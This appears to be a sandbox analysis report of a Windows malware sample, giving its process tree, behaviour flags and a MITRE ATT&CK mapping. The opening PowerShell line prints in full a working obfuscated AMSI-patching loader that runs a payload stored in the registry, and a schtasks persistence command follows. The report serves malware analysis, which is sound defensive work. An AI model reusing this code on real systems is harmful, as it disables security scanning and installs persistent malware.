  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:GfDWAPegVWWI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$GfjdylNKmWzFVi,[Parameter(Position=1)][Type]$xFNWMmPLXe)$RGSXfALcysy=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('Re'+[Char](102)+''+'l'+'e'+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'Me'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+'eT'+[Char](121)+''+'p'+''+[Char](101)+'',''+'C'+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+'e'+''+[Char](97)+'l'+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+'A'+''+'u'+''+'t'+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+'a'+'ss',[MulticastDelegate]);$RGSXfALcysy.DefineConstructor(''+[Char](82)+'TS'+[Char](112)+''+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+[Char](108)+''+'N'+'a'+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+'i'+''+'d'+''+[Char](101)+'B'+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'P'+[Char](117)+'b'+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$GfjdylNKmWzFVi).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+'d');$RGSXfALcysy.DefineMethod(''+'I'+''+'n'+''+'v'+''+[Char](111)+''+'k'+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+','+''+'H'+''+'i'+'d'+[Char](101)+''+'B'+''+'y'+''+'S'+''+[Char](105)+''+[Char](103)+','+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+''+[Char](108)+''+'o'+'t'+[Char](44)+''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+'a'+[Char](108)+'',$xFNWMmPLXe,$GfjdylNKmWzFVi).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+''+[Char](109)+''+'e'+','+'M'+''+'a'+''+'n'+'age'+'d'+'');Write-Output $RGSXfALcysy.CreateType();}$VpNoFCEEXxUPN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+'ste'+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+'i'+'c'+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+'ft'+[Char](46)+'W'+[Char](105)+''+[Char](110)+'32.'+[Char](85)+'n'+[Char](115)+'a'+'f'+''+'e'+'N'+[Char](97)+'t'+[Char](105)+''+[Char](118)+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+'t'+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+'s'+'');$dmIKowLFQImbUL=$VpNoFCEEXxUPN.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+'e'+''+'s'+'s',[Reflection.BindingFlags](''+'P'+'u'+[Char](98)+''+'l'+'ic'+[Char](44)+'S'+'t'+''+[Char](97)+''+[Char](116)+'i'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BhJbsxXxmaPhAUZzCFZ=GfDWAPegVWWI @([String])([IntPtr]);$xqKWRGiwrPjGseSxJhmoSb=GfDWAPegVWWI @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$YKKDHGMENrc=$VpNoFCEEXxUPN.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+'l'+[Char](101)+''+'H'+''+[Char](97)+''+'n'+''+'d'+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+'n'+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+'d'+''+'l'+''+'l'+'')));$fVauQypgrBeZfu=$dmIKowLFQImbUL.Invoke($Null,@([Object]$YKKDHGMENrc,[Object]('L'+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+'a'+'r'+[Char](121)+'A')));$dZOojYeWQAeSlrWQp=$dmIKowLFQImbUL.Invoke($Null,@([Object]$YKKDHGMENrc,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'P'+'r'+'o'+[Char](116)+''+[Char](101)+'c'+'t'+'')));$tOmsLaX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($fVauQypgrBeZfu,$BhJbsxXxmaPhAUZzCFZ).Invoke(''+'a'+''+'m'+''+[Char](115)+''+'i'+''+[Char](46)+''+[Char](100)+''+'l'+'l');$iSxuWhQAQIKrjjBYH=$dmIKowLFQImbUL.Invoke($Null,@([Object]$tOmsLaX,[Object](''+'A'+''+'m'+'s'+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+'e'+'r'+'')));$RnQcyuqeIv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dZOojYeWQAeSlrWQp,$xqKWRGiwrPjGseSxJhmoSb).Invoke($iSxuWhQAQIKrjjBYH,[uint32]8,4,[ref]$RnQcyuqeIv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iSxuWhQAQIKrjjBYH,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dZOojYeWQAeSlrWQp,$xqKWRGiwrPjGseSxJhmoSb).Invoke($iSxuWhQAQIKrjjBYH,[uint32]8,0x20,[ref]$RnQcyuqeIv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+'W'+'A'+''+[Char](82)+''+'E'+'').GetValue('x'+'4'+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4976
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3916
- C:\Users\Admin\AppData\Roaming\x4svchost
  C:\Users\Admin\AppData\Roaming\x4svchost
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:3596

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1116

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1148

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1292

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1372
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  - Modifies registry class
  PID:2724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1392

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1604

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1668

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1676

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1716

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1832

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1984

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2072

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2112

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2192

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2388

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2584

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2744

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2792

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2808

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2820

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:2232

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3116

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3460

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3544
- C:\Users\Admin\AppData\Local\Temp\d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe
  "C:\Users\Admin\AppData\Local\Temp\d083bef3ab3d00e401c7c14d5c381b34a8d54e81cdb1a7558e3f251330421000.exe"
  2⤵
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:1704
- - C:\Users\Admin\AppData\Local\Temp\x444.exe
    "C:\Users\Admin\AppData\Local\Temp\x444.exe"
    3⤵
    - Checks computer location settings
    - Drops startup file
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1008
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "x4svchost" /tr "C:\Users\Admin\AppData\Roaming\x4svchost"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:3740
- - C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe
    "C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious use of AdjustPrivilegeToken
    PID:4244

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3648

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3856

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4008

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4448

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2120

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
PID:2572

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:4220

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:4500

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4808

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3564

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4224

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4424

C:\Windows\System32\alg.exe
C:\Windows\System32\alg.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1900

C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.106\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:1664

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\elevation_service.exe"
1⤵
- Executes dropped EXE
PID:872

C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
"C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:1320

\??\c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
"c:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE"
1⤵
- Executes dropped EXE
PID:1944

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
PID:3164

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery